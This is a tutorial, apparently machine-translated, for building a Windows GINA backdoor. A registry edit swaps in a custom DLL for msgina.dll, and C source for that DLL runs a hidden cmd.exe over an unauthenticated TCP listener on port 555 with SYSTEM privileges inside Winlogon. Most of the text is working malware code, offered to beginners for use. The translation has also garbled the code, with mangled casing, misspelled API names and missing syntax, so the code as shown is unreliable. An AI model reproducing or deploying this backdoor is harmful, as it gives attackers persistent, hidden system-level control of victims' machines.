GinabackDoor simple implementation
Writeby: liond8
Email: liond8@126.com
Website: http://liond8.126.com
It was originally a manuscript of the black defense, but I haven't had news for 3 months. I am not equal. Although this Dongdong is not a deep technology, it is still helpful for the brothers who introduce beginners. Master don't make me.
The first thing to introduce Gina's role in Windows. NT, 2K, etc. are multi-user systems, and there is an authentication process before entering the user shell. This verification process is done by our GINA. GINA provides a graphical landing interface in addition to verifying the user's identity. The default Gina is Msgina.dll you can find under the system directory system32. In addition to providing the default Gina also allows custom development Gina replacement Msgina.dll to implement some of its own authentication methods. This provides conditions for our back door. To replace the system default loading msgina.dll is easy to edit the registry, just edit the registry, in the HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon item, join a type of REG_SZ named Ginadll Key value. Data fills in the name of the GINADLL we replace.
E.g:
[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon]
"Ginadll" = "ginadll.dll" (ginadll.dll is the Gina used to replace it)
In our own DLL, as long as the bond is a shell, the other directly call Msgina.dll. To put it bluntly, install an intermediate layer. Make it to achieve a back door. Gina is loaded into the WinLogin process. WinLogin is the system's user interaction login process is system permissions, so our back door also has System permissions. This is better for the back door.
Since we have to replace 15 GINA functions. All written is quite large. We will choose a few important way to do demonstrate. Others are also almost the Msgina.dll call directly to the next layer. For details, please refer to the full source code.
Typedef Bool (WinApi * Pfuncwlxnegotiate) (DWORD, DWORD *);
Typedef Bool (WinApi * PfuncwlxInitialize) (LPWSTR, HANDLE, PVOID, PVOID, PVOID *);
Typedef void (WinApi * pfuncwlxdisplaysasasnetice) (PVOID);
TypedEf Int (WinApi * PfuncWlxLoggedoutSAS) (PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
Typedef Bool (WinApi * PfuncwlxactivateUsershell) (PVOID, PWSTR, PWSTR, PVOID);
Typedef Int (WinAPI * PfuncWlxLoggedonsas) (PVOID, DWORD, PVOID);
Typedef void (WinAPI * PfuncwlxDisPlayLockedNotice) (PVOID);
TypedEf Int (WinApi * PfuncwlxwkstalockedSas) (PVOID, DWORD);
Typedef Bool (WinAPI * Pfuncwlxislockok) (PVOID);
TypeDef Bool (WinApi * PfuncwlxisLogoffok) (PVOID);
TypedEf void (WinAPI * PFuncWlxLogoff) (PVOID); TypeDef Void (WinApi * PfuncwlxShutdown) (PVOID, DWORD);
Typedef Bool (WinApi * PfuncwlxScreensaverNotify) (PVOID, BOOL *);
TypedEf Bool (WinApi * PfuncwlxStartApplication) (PVOID, PWSTR, PVOID, PWSTR);
TypedEf Bool (WinAPI * PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);
Global variables for the back door
//pipeline
Handle hstdout = null, hsread = NULL;
Handle hstdinput = null, hswrite = NULL;
// Used to control whether the thread ends back
Bool bexit = false;
/ / Save the created CMD process sheder
Handle HProcess = NULL;
// This is the function that the Winlogon process is called, used to check the WinLogin version supported by Gina
Bool WinAPI WLXNEGOTIAT (DWORD DWINLOGONVERSION, DWORD * PDWDLVERSION)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
// Get the WLXNEGOTIATE function in msgina.dll
Pfuncwlxnegotiate PWLXnegotiate = (Pfuncwlxnegotiate) GetProcaddress (HDLL, "WLXnegotiate");
IF (! PWLXNEGOTIATE)
Return False;
// Call down
Return PWLXNEGOTIATE (DWWINLOGONVERSION, PDWDLVERSION);
}
/ / Initialize a GINADLL for a special window station
Bool WinAPI WLXInitialize (LPWSTR LPWINSTA, HANDLE HWLX,
PVOID PVRESERVED, PVOID PWINLOGONFUNCTIONS, PVOID * PWLXCONTEXT)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
PfuncwlxInitialize Pwlxinitialize = (PFuncwlxInitialize) GetProcaddress (HDLL, "WLXInitialize);
IF (! PWLXInitialize)
Return False;
// Initialize the WS2_32.dll of Windows Socket
Wsadata wsadata;
IF (WsaStartup (MakeWord (2, 2), & WSADATA)! = 0)
Return False;
// Top-up
Return PWLXInitialize (LPwinsta, HWLX, PVRESERVED, PWINLOGONFUNCTIONS,
PWLXCONTEXT);
}
// WinLogon receives a SAS event when there is no user login calls this function
Int WinAPI WLXLoggedoutsas (PVOID PWLXCONText, DWORD DWSASTYPE, PLUID PAUThenticationId, Psid Plogonsid, Pdword PdwOptions,
Phandle PHTOKEN, PWLX_MPR_NOTIFY_INFO PMPRNOTIFYINFO,
Pvoid * pprofile)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
PfuncwlxLoggedoutSas PWLXLoggedoutSas = (PFuncWlxLoggedoutSas) GetProcaddress (HDLL, "WLXLoggedoutSas);
IF (! PWLXLoggedoutSas)
Return False;
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // Create a mutually exclusive object
WaitforsingleObject (hmutex, infinite);
// The main thread of the back door begins.
CreateThread (NULL, NULL, STARTINIT, NULL, NULL, NULL);
ReleaseMutex (HMUTEX);
CloseHandle (hmutex);
// Call the lower layer of WLXLoggedoutSas.
int RET = PWLXLoggedoutSas (PWLXContext, DWSASTYPE, PAUThenticationID, PLOGONSID, PDWOPTIONS, PHTOKEN, PMPRNOTIFYINFO, PPROFILE);
Return Ret;
}
// StartInit thread
DWORD WINAPI STARTINIT (PVOID LP)
{
Socket Sock = NULL;
// Create a TCP Socket
SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
SockAddr_in addr_in = {0};
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (555); // port number, you can change yourself
Addr_in.sin_addr.s_un.s_addr = HTONL (INADDR_Any);
/ / Bind to 555 ports
IF (Bind (SockAddr *) & addr_in, sizeof (sockaddr)) == Socket_ERROR)
Return 1;
// Listening
Listen (SOCK, 1);
SockAddr_in sin = {0};
Int size = sizeof (sin);
While (True)
{
/ / Accept a connection request Returns a socket without requesting
// Return to another connection after a connection is disconnected
Socket Recvsock = Accept (Sock, (SockAddr *) & sin, & size);
IF (Recvsock == Invalid_socket) {
Sleep (1000);
CONTINUE;
}
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // Create a mutually exclusive object
WaitforsingleObject (hmutex, infinite);
// Create a back door
Handle Hthread = CreateThread (Null, Null, Backdoor, & Recvsock, 0, NULL); ReleaseMutex (HMutex);
CloseHandle (hmutex);
// Wait for the Backdoor thread to end.
WaitforsingleObject (hthread, infinite);
Bexit = false;
}
Return 1;
}
// Backdoor thread
DWORD WINAPI Backdoor (LPVOID LP)
{
// You can add some password authentication such as yourself.
// Use to set the pipe to inherit the sub-process
Security_attributes sa;
Sa.binherithandle = true;
Sa.nlength = SizeOf (SA);
Sa.lpsecurityDescriptor = null;
// Create a pipeline
CreatePipe (& HSRead, & Hstdout, & Sa, 0);
CreatePipe (& HSTDINPUT, & HSWRITE, & SA, 0);
STARTUPINFO STARTINFOR = {0};
Process_information proinfor = {0};
/ / Redirect the standard input and output of the sub-process, for us to build a good pipeline
STARTINFOR.CB = SizeOf (StartupInfo);
STARTINFOR.WSHOWINDOW = SW_HIDE;
STARTINFOR.DWFLAGS = Startf_useshowWindow | Startf_usestdhandles;
STARTINFOR.HSTDOUTPUT = Startinfor.hstderRr = HSTDOUT
STARTINFOR.HSTDINPUT = HSTDINPUT;
/ / Get the full path to cmd
TCHAR SYSDIR [MAX_PATH] = {0};
GetSystemDirectory (sysdir, max_path);
IF (sysdir [strlen (sysdir) -1]! = '//')
STRCAT (sysdir, "//");
STRCAT (SYSDIR, "cmd.exe");
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // Create a mutually exclusive object
WaitforsingleObject (hmutex, infinite);
// Create a CMD child process
CreateProcess (NULL, SYSDIR, NULL, NULL, TRUE, NULL, NULL, NULL, & StartInfor, & Proin)
HPROCESS = procor.hprocess;
// Since we don't operate the CMD's access output, we can close
CloseHandle (HSTDOUT);
CloseHandle (HSTDINPUT);
Handle Harray [2] = {0};
// Create a thread that receives the command thread and a return result
Harray [0] = CreateThread (Null, Null, Recvthread, & Sock, Null, NULL);
Harray [1] = CreateThread (Null, Null, Sendthread, & Sock, NULL, NULL);
ReleaseMutex (HMUTEX);
CloseHandle (hmutex);
// Waiting for 2 threads
WaitFormultipleObjects (2, Harray, True, Infinite); CloseSocket (SOCK);
Return 1;
}
// Recvthread thread
DWORD WINAPI Recvthread (LPVOID LP)
{
Socket SOCK = * (Socket *) LP;
TCHAR CMDBUF [512] = {0}; // Receive the BUF of the command
INT NUM = 0;
While (True)
{
IF (Bexit == True)
Return 1;
TCHAR TBUF [2] = {0};
int RET = Recv (SOCK, TBUF, 1, 0); // Receive a character
IF (RET == 1)
{
Num ; // Received characters
STRCAT (CMDBUF, TBUF); // Add to CMDBUF
Send (SOCK, TBUF, 1, 0); //
IF (TBUF [0] == '/ n') // If you receive it
{
TCHAR BUF [5] = {0};
DWORD A = 0;
/ / Write to the standard input reading of CMD in the pipeline
Writefile (HSWRITE, CMDBUF, NUM, & A, NULL);
Memcpy (BUF, CMDBUF, 4);
// If it is an exit command to set the thread end flag
int RET = _StriCMP (BUF, "EXIT");
IF (RET == 0)
BEXIT = True;
MEMSET (CMDBUF, 0, 512);
Num = 0;
}
}
Else
{
/ / If the connection interrupts terminate the CMD process
BEXIT = True;
DWORD A = 0;
GetExitcodeProcess (HProcess, & A);
TerminateProcess (HProcess, A);
}
}
Return 1;
}
// Sendthread thread
DWORD WINAPI Sendthread (LPVOID LP)
{
Socket SOCK = * (Socket *) LP;
TCHAR BUF [512] = {0};
DWord readsize = 0;
While (True)
{
If (bexit == true) // If the end flag is returned for the true thread
Return 1;
/ / View the pipeline if there is data readable
PeeknamedPipe (HSread, BUF, 512, & Readsize, Null, NULL);
// If you read, you don't check again.
IF (readsize> 0)
Readfile (HSREAD, BUF, 512, & Readsize, NULL);
Else
{
Sleep (100);
CONTINUE;
}
// Send the data read from the pipe to the client.
Send (Sock, Buf, Readsize, 0);
MEMSET (BUF, 0, 512);
}
Return 1;
}
The above is basically the core part of the back door, and all 15 functions are overloaded to the next layer to call 15 functions of the compiled DLL. Place your own DLL in the system directory and carry your own registry. The latter is installed. Since we are replacing the DLL, it must be restarted to take effect. This is also a place where it is. Deleting the back door is also simply deleted the key value we added directly. Because this is a replacement system DLL, please take carefully. Otherwise, the system will not start properly.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ==
